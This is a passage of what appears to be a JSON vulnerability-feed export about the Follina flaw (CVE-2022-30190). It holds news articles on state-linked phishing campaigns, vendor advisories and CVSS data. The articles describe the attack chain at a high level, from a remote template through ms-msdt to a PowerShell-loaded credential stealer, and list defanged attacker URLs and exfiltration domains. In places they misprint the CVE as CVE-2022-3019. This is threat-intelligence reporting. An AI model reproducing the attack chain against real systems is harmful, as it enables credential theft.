MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 and patched by Microsoft in May.\n\nProofpoint says the malicious file used in the recruitment phishing campaigns, if downloaded, executes a script that can ultimately check for virtualized environment to abuse and \u201csteals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil.\u201d\n\nProofpoint explained in a tweet, \u201cThe extensive reconnaissance conducted by [a] second Powershell script demonstrated an actor interested in a large variety of software on a target\u2019s computer.\u201d It is that behavior that raised concerns that the campaign had ties to a \u201cstate aligned nexus,\u201d researchers noted.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T12:45:00", "type": "threatpost", "title": "Follina Exploited by State-Sponsored Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T12:45:00", "id": "THREATPOST:44942C746E9FFDC2F783FA19F0AFD348", "href": "https://threatpost.com/follina-exploited-by-state-sponsored-hackers/179890/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T12:27:08", "description": "Advanced persistent threat group Fancy Bear is behind a [phishing campaign](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) that uses the specter of nuclear war to exploit a known one-click Microsoft flaw. The goal is to deliver malware that can steal credentials from the Chrome, Firefox and Edge browsers.\n\nThe attacks by the Russia-linked APT are tied the Russian and Ukraine war, according to researchers at Malwarebytes Threat Intelligence. They report that Fancy Bear is pushing malicious documents weaponized with the exploit for [Follina](<https://threatpost.com/microsoft-workaround-0day-attack/179776/>) ([CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>)), a known Microsoft one-click flaw, according to a [blog post](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>) published this week.\n\nOn June 20, Malwarebytes researchers first observed the weaponized document, which downloads and executes a .Net stealer first [reported by Google](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>). Google\u2019s Threat Analysis Group (TAG) said Fancy Bear already has used this stealer to target users in the Ukraine.\n\nThe Computer Emergency Response Team of Ukraine (CERT-UA) [also independently discovered](<https://cert.gov.ua/article/341128>) the malicious document used by Fancy Bear in the recent phishing campaign, according to Malwarebytes.\n\n## **Bear on the Loose**\n\nCERT-UA [previously identified](<https://threatpost.com/cyberwar-ukraine-military/179421/>) Fancy Bear as one of the numerous APTs pummeling Ukraine with cyber-attacks in parallel with the invasion by Russian troops that began in late February. The group is believed to be operating on the behest of Russian intelligence to gather info that would be useful to the agency.\n\nIn the past Fancy Bear has been linked in attacks targeting elections [in the United States](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) and [Europe](<https://threatpost.com/microsoft-russias-fancy-bear-working-to-influence-eu-elections/142007/>), as well as [hacks against sporting and anti-doping agencies](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) related to the 2020 Olympic Games.\n\nResearchers first flagged Follina in April, but [only in May](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) was it officially identified as a zero-day, one-click exploit. Follina is associated with the Microsoft Support Diagnostic Tool (MSDT) and uses the ms-msdt protocol to load malicious code from Word or other Office documents when they\u2019re opened.\n\nThe bug is dangerous for a number of reasons\u2013not the least of which is its wide attack surface, as it basically affects anyone using Microsoft Office on all currently supported versions of Windows. If successfully exploited, attackers can gain user rights to effectively take over a system and install programs, view, change or delete data, or create new accounts.\n\nMicrosoft recently patched Follina in its [June Patch Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) release but it remains [under active exploit](<https://threatpost.com/follina-exploited-by-state-sponsored-hackers/179890/>) by threat actors, including known APTs.\n\n**Threat of Nuclear Attack**\n\nFancy Bear\u2019s Follina campaign targets users with emails carrying a malicious RTF file called \u201cNuclear Terrorism A Very Real Threat\u201d in an attempt to prey on victims\u2019 fears that the invasion of Ukraine will escalate into a nuclear conflict, researchers said in the post. The content of the document is an [article](<https://www.atlanticcouncil.org/blogs/new-atlanticist/will-putin-use-nuclear-weapons-in-ukraine-our-experts-answer-three-burning-questions/>) from the international affairs group Atlantic Council that explores the possibility that Putin will use nuclear weapons in the war in Ukraine.\n\nThe malicious file uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268[.]frge[.]io/article[.]html. The HTML file then uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme, researchers said.\n\nThe PowerShell loads the final payload\u2013a variant of the .Net stealer previously identified by Google in other Fancy Bear campaigns in the Ukraine. While the oldest variant of the stealer used a fake error message pop-up to distract users from what it was doing, the variant used in the nuclear-themed campaign does not, researchers said.\n\nIn other functionality, the recently seen variant is \u201calmost identical\u201d to the earlier one, \u201cwith just a few minor refactors and some additional sleep commands,\u201d they added.\n\nAs with the previous variant, the stealer\u2019s main pupose is to steal data\u2014including website credentials such as username, password and URL\u2013from several popular browsers, including Google Chrome, Microsoft Edge and Firefox. The malware then uses the IMAP email protocol to exfiltrate data to its command-and-control server in the same way the earlier variant did but this time to a different domain, researchers said.\n\n\u201cThe old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data,\u201d they wrote. \u201cThe new variant uses the same method but a different domain, www.specialityllc[.]com. Interestingly both are located in Dubai.\u201d\n\nThe owners of the websites most likely have nothing to do with APT28, with the group simply taking advantage of abandoned or vulnerable sites, researchers added.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-23T12:21:33", "type": "threatpost", "title": "Fancy Bear Uses Nuke Threat Lure to Exploit 1-Click Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-23T12:21:33", "id": "THREATPOST:4365205CB12A4437E20A1077682B9CF8", "href": "https://threatpost.com/fancy-bear-nuke-threat-lure/180056/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T16:46:30", "description": "Microsoft has released a workaround for [a zero-day flaw](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) that was initially flagged in April and that attackers already have used to target organizations in Russia and Tibet, researchers said.\n\nThe remote control execution (RCE) flaw, tracked as [CVE-2022-3019](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is associated with the Microsoft Support Diagnostic Tool (MSDT), which, ironically, itself collects information about bugs in the company\u2019s products and reports to Microsoft Support.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 in [a bachelor\u2019s thesis from August 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>)\u2014with attackers apparently targeting Russian users\u2013and reported to Microsoft on April 21, according to research firm Recorded Future\u2019s [The Record](<https://therecord.media/microsoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet/>).\n\nA Malwarebytes Threat Intelligence analyst also spotted the flaw back in April but could not fully identify it, the company said [in a post on Twitter](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1531398009103142912%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Ftherecord.media%2Fmicrosoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet%2F>) over the weekend, retweeting the [original post](<https://twitter.com/h2jazi/status/1513870903590936586>) about the vulnerability, also made on April 12, from [@h2jazi](<https://twitter.com/h2jazi>).\n\nWhen the flaw was reported, Microsoft didn\u2019t consider it an issue. It\u2019s clear now that the company was wrong, and the vulnerability again raised the attention of researchers at Japanese security vendor Nao Sec, who[ tweeted a fresh warning](<https://twitter.com/nao_sec/status/1530196847679401984>) about it over the weekend, noting that it was being used to target users in Belarus.\n\nIn analysis over the weekend noted security researcher Kevin Beaumont [dubbed the vulnerability](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) \u201cFollina,\u201d explaining the zero-day code references the Italy-based area code of Follina \u2013 0438.\n\n## **Current Workaround**\n\nWhile no patch yet exists for the flaw, Microsoft is recommending that affected users disable the MSDT URL to mitigate it for now. This \u201cprevents troubleshooters being launched as links including links throughout the operating system,\u201d the company wrote in their advisory.\n\nTo do this, users must follow these steps: Run \u201c:**Command Prompt**** as Administrator****\u201c**; Back up the registry key by executing the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201c; and execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n\u201cTroubleshooters can still be accessed using the [Get Help application](<https://apps.microsoft.com/store/detail/get-help/9PKDZBMV1H3T?hl=en-us&gl=US>) and in system settings as other or additional troubleshooters,\u201d the company said.\n\nMoreover, if the calling application is an Office app then by default, Office opens the document from the internet in Protected View and Application Guard for Office, \u201cboth of which prevent the current attack,\u201d Microsoft said. However, Beaumont refuted that assurance in his analysis of the bug.\n\nMicrosoft also plans to update CVE-2022-3019 with further information but did not specify when it would do so, according to the advisory.\n\n## **Significant Risk**\n\nIn the meantime, the unpatched flaw poses a significant risk for a number of reasons, Beaumont and other researchers noted.\n\nOne is that it affects such a wide swathe of users, given that it exists in all currently supported Windows versions and can be exploited via Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus.\n\n\u201cEvery organization that is dealing with content, files and in particular Office documents, which is basically everyone in the globe, is currently exposed to this threat,\u201d Aviv Grafi, CTO and founder of security firm [Votiro](<https://votiro.com/>), wrote in an e-mail to Threatpost.\n\nAnother reason the flaw poses a major threat is its execution without action from end users, both Beaumont and Grafi said. Once the HTML is loaded from the calling application, an MSDT scheme is used to execute a PowerShell code to run a malicious payload, Grafi explained.\n\nSince the flaw is abusing the remote template feature in Microsoft Word, it is not dependent on a typical macro-based exploit path, which are common within Office-based attacks, Beaumont said.\n\n\u201cWhat makes this vulnerability so difficult to avoid is the fact that the end user does not have to enable macros for the code to execute, making it a \u2018zero-click\u2019 remote code execution technique used through MSDT,\u201d Grafi concurred.\n\n## **Under Active Attack**\n\nClaire Tills, senior research engineer for security firm Tenable, compared the flaw to last year\u2019s zero-click [MSHTML bug](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>)**, **tracked as [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>), which was pummeled by attackers, including the [Ryuk ransomware gang](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>).\n\n\u201cGiven the similarities between CVE-2022-30190 and CVE-2021-40444, and that researchers speculate other protocol handlers may also be vulnerable, we expect to see further developments and exploitation attempts of this issue,\u201d she wrote in an e-mail to Threatpost.\n\nIndeed, threat actors already have pounced on the vulnerability. On Monday, Proofpoint Threat Insight also [tweeted](<https://twitter.com/threatinsight/status/1531688214993555457>) that threat actors were using the flaw to target organizations in Tibet by impersonating the \u201cWomen Empowerments Desk\u201d of the Central Tibetan Administration.\n\nWhat\u2019s more, the workaround that Microsoft currently offers itself has issues and won\u2019t provide much of a fix in the long-term, especially with the bug under attack, Grafi said. He said the workaround is\u201dnot friendly for admins\u201d because it involves \u201cchanges in the Registry of the end user\u2019s endpoints.\u201d\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T10:38:37", "type": "threatpost", "title": "Microsoft Releases Workaround for \u2018One-Click\u2019 0Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-3019", "CVE-2022-30190"], "modified": "2022-06-01T10:38:37", "id": "THREATPOST:4C8D995307A845304CF691725B2352A2", "href": "https://threatpost.com/microsoft-workaround-0day-attack/179776/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-01-10T22:21:06", "description": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.", "cvss3": {}, "published": "2022-08-09T07:00:00", "type": "mscve", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-35743"], "modified": "2022-08-09T07:00:00", "id": "MS:CVE-2022-35743", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35743", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T22:21:53", "description": "A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user\u2019s rights.\n\nPlease see the [MSRC Blog Entry](<https://aka.ms/CVE-2022-30190-Guidance>) for important information about steps you can take to protect your system from this vulnerability.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T07:00:00", "type": "mscve", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-14T07:00:00", "id": "MS:CVE-2022-30190", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-08-24T23:29:42", "description": "A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (CVE-2022-34713)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34713"], "modified": "2022-08-09T00:00:00", "id": "CPAI-2022-0471", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-02T17:59:17", "description": "A remote code execution vulnerability exists in Microsoft Support Diagnostic Tool, also known as, \"Follina\". Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Support Diagnostic Tool Remote Code Execution (CVE-2022-30190)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T00:00:00", "id": "CPAI-2022-0283", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-11T18:51:48", "description": "A remote code execution vulnerability exists when Microsoft Windows MSDT is called using the URL protocol from a calling application.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34713"], "modified": "2022-08-09T00:00:00", "id": "CISA-KEV-CVE-2022-34713", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run code with the privileges of the calling application.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-14T00:00:00", "id": "CISA-KEV-CVE-2022-30190", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-08-11T10:15:41", "description": "Threat Level Vulnerability Report For a detailed advisory, download the pdf file here Summary Microsoft Patch Tuesday addresses CVE-2022-34713, also known as DogWalk, as well as numerous issues affecting Microsoft Exchange Server, Microsoft Windows Support Diagnostic Tool (MSDT), Windows Print Spooler Components, and Windows Secure Boot, among other products that lead in RCE and privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-11T08:15:28", "type": "hivepro", "title": "Microsoft tackles DogWalk zero-day vulnerability and multiple privilege escalation vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34713"], "modified": "2022-08-11T08:15:28", "id": "HIVEPRO:A3588E2F7CB7E12883BF5D4F364E645F", "href": "https://www.hivepro.com/microsoft-tackles-dogwalk-zero-day-vulnerability-and-multiple-privilege-escalation-vulnerabilities/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-10T14:16:09", "description": "Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The recent incident is related to TA570, wherein the attackers exploited the Follina vulnerability (CVE-2022-30190) to compromise the Domain Controller and eventually gain access to confidential files.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-04T12:38:02", "type": "hivepro", "title": "Exploitation of Follina leads to takeover of domain controller", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-11-04T12:38:02", "id": "HIVEPRO:04FABAE2F2B647B3488AA0025301D637", "href": "https://www.hivepro.com/exploitation-of-follina-leads-to-takeover-of-domain-controller/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-05T22:10:09", "description": "Threat Level Attack Report For a detailed advisory, download the pdf file here Summary The unknown threat actor employs the Woody RAT to spear-phish Russian organizations. The malware was distributed via archive files and later switched to Microsoft Office documents leveraging the now-patched CVE-2022-30190 vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-05T18:22:17", "type": "hivepro", "title": "Woody RAT leverages Follina to target Russia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T18:22:17", "id": "HIVEPRO:CA37C8D639BE8660B8996BB5FB4F3C0F", "href": "https://www.hivepro.com/woody-rat-leverages-follina-to-target-russia/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T15:15:32", "description": "Threat Level Attack Report For a detailed advisory, download the pdf file here Summary Microsoft has issued a patch after almost 15 days for a zero-day vulnerability identified as CVE-2022-30190 after various proof-of-concept (POCs) indicating that it is actively exploited became public. Security researchers have also named this security flaw as Follina. A Chinese actor group, TA413 is been observed targeting organizations in Tibet with a malicious document with Follina", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T10:13:53", "type": "hivepro", "title": "Follina: A zero-day vulnerability in Microsoft Office", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 